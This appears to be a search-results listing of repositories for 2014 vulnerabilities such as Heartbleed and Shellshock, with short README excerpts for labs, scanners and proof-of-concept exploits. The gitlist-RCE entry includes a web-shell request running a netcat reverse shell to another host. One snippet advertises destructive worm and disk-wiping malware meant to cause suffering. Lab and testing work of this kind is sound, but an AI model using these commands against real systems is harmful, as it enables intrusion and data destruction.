29719 matches found
Heartbleed_Dockerfile_with_Nginx
Testing Heartbleed with Nginx Dockerfile This repository contains Dockerfile of Nginx with the vulnerable OpenSSL version 1.0.1f for testing CVE-2014-0160 Heartbleed Vulnerability. Base Docker Image debian:latest Installation 1. Install Docker Example with Debian: apt-get install -y docker 2...
Linux-kernel-code-injection_CVE-2014-3153
This repository does not have a README...
heartbleedscanner
Heartbleed Scanner Network Scanner for OpenSSL Memory Leak CVE-2014-0160 -t parameter to optimize the timeout in seconds. -f parameter to log the memleak of vulnerable systems. -n parameter to scan entire network. -i parameter to scan from a list file. Useful if you already have targets. -r...
Shellshock-CVE-2014-6271
This repository does not have a README...
it355-lab4-enterprise-lan-security
IT355 Lab 4: Enterprise LAN Security & Shellshock Analysis 📌 Project Overview This repository contains a comprehensive security assessment of an enterprise LAN environment. The core focus of this project was the identification, exploitation, and remediation of the Shellshock CVE-2014-6271...
Shellshock_CVE-2014-6271
Shellshock CVE-2014-6271 Shellshock docker-compose.yml, poc.py 파일을 다운 받아 주세요 반드시 pip install requests 를 통해 requests 라이브러리를 다운받아 주세요!!! uv를 사용하시는 분들은 uv를 통해 requests 라이브러리를 venv 안에 넣어주세요!!! CVE Official Description --- In GNU Bash versions prior to 4.3, there was a problem with handling strings th...
ccs-eval
Evaluates hosts for CVE-2014-0224 vulnerability https://vulners.com/cve/CVE-2014-0224 Usage: ccs-eval.py list-of-hosts.txt -Takes in a list of hosts, line seperated. Checks the host for common SSL ports using nmap. Peforms PoC injection test supplied by RedHat fake-client-early-ccs.pl. Writes...
CVE-2014-0160_OpenSSL_1.0.1f_Heartbleed
CVE-2014-0160OpenSSL1.0.1fHeartbleed...
Exploit-CVE-2014-4210-
START WITH A COOL THING DUDEUSE IT TO F&CK UPGRADES TO CAUSE HUMAN SUFFERING: 1. Self-Replicating Worm : Spreads via SSH brute-force/SMB exploits to all connected networks. 2. MBR Overwrite : Brick physical hardware by destroying partition tables no recovery possible. 3. Zero-Day RCE : Exploits...
thm_steelmountain_CVE-2014-6287
thmsteelmountainCVE-2014-6287 a python3 version of the exploit written for CVE-2014-6287. Useful for completing the "Steel Mountain" room on TryHackMe.com without the use of metasploit...
CVE-2014-3566-poodle-cookbook
CVE-2014-3566-poodle This cookbook will error out your chef run if your server is vulnerable to CVE-2014-3566. Although this cookbook can be used to watch for failed chef runs, it is also a proof of concept. Supported Platforms Ubuntu 12.04 Centos-6.4 Attributes...
Shellshock_vuln_Exploit
🚨 Shellshock RCE Exploit CVE-2014-6271 This is a Python exploit for the Shellshock vulnerability CVE-2014-6271, which affects GNU Bash. The exploit targets CGI scripts on vulnerable web servers and establishes a reverse shell to the attacker's machine. CVE ID CVE-2014-6271 Disclaimer This tool is...
gitlist-RCE
gitlist-RCE CVE-2014-4511 example: after shell upload successfully: access: http://192.168.1.126/cache/x.php/?cmd=nc -nv 192.168.1.127 1111 -e /bin/sh http://192.168.1.126/cache/x.php/?cmd=nc%20-nv%20192.168.1.127%201111%20-e%20/bin/sh...
CVE-2014-160
CVE-2014-160 exploit Use like this: ./cve-2014-160 dvwa.local https && strings datadump.bin...
lighty-sqlinj-demo
title: Ep4 - Network-Related Vulnerability members: Ciro S. Costa Marcela Terakado date: 10 Nov, 2015 Related vulnerability: root@kitploit: CVE-2014-2323 1 was assigned to SQL injection bug. CVE-2014-2324 2 was assigned to the path traversal bug. Confirm:...
WebLogic-SSRF_CVE-2014-4210
WebLogic-SSRFCVE-2014-4210 Weblogic SearchPublicRegistries SSRFCVE-2014-4210 Exploit Script based on Python3 Usage optional arguments: -h, --help show this help message and exit -u U Single Target URL -uf UF Read URLs from file -p P Only scan specified ports -sn SN Only scan specified subnets -sf...
Shellbash-CVE-2014-6271
Shellshock Remote Command Injection CVE-2014-6271 中文版本Chinese version Build and run the vulnerable environment: root@kitploit: docker-compose build docker-compose up -d When you visit http://your-ip/ you should see two files: safe.cgi victim.cgi safe.cgi generated by the latest version of bash, a...
CVE-2014-3153
This repository does not have a README...
shellshock-victim-host
shellshock-victim-host A docker container vulnerable to Shellshock - CVE-2014-6271 Run root@kitploit: podman build -t shellshock-victim . podman run -it -p 80:8080 shellshock-victim Note: Builds with docker as well. The vulnerable app will be deployed on : http://localhost:8080/victim.cgi -...
CVE-2014-4210-SSRF-PORTSCANNER-POC
CVE-2014-4210 SSRF PORTSCANNER PoC Author: Aaron Mizrachi unmanarc [email protected] Twitter: https://twitter.com/unmanarc License: LGPLv3 Liability / Legal Disclaimer This project is made for EDUCATIONAL and ETHICAL TESTING purposes ONLY. Using of source code in this repository for attackin...